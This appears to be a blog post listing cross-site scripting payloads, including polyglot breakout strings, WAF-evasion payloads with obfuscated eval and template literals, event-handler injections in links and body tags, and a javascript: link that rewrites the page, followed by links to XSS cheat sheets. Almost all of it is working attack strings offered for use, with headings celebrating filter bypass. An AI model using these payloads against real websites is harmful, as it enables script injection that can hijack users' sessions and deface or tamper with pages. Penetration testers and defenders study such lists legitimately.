Some XSS payloads

JuanDeLemos:
Some XSS payload starts

<!'/*!"/*!//'/*//"/*--!>

>');'>%>?>">">\x22\x3e/*-->]]>

<!'/*!"/*!//'/*//"/*--!><Input/Autofocus/%0D*/Onfocus=confirm`1`//><Svg>

Fuck WAF
<script>a=xss<!--<script/\;</script><input value="${alert(1)}`</script/">

Fuck WAF with string obfuscation
<script>eval(ale${[[[[]=[]]=[[]=[]]]=[[]=[]]]=[]}rt(666));</script/">

XSS in href link
<a href="" onclick=``/name==alert(1)>clickme1</a>

or
<a href="" onclick=``/*/alt="*//alert(1)//">clickme2</a>

Rewrite page
<a href="javascript:document.write('c========3'); void(0);">Middle-click me</a>

New test
'\"--!><Body /Onpageshow=confirm`1`>

"-->'><script>alert(1);</script>"

List of different XSS Cheat Sheet`s:

- Big collection of XSS payloads: https://github.com/foospidy/payloads/blob/master/other/xss/rafaybaloch.txt
- OWASP XSS Filter Evasion Cheat Sheet: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
- HTML5 Security Cheatsheet: https://html5sec.org
- Brutelogic cheat sheet: http://brutelogic.com.br/blog/cheat-sheet/
- XSS Payloads: http://www.xss-payloads.com/index.html

All About Hacking & Cybersecurity

Search This Blog

Some XSS payloads

Labels

Comments

Post a Comment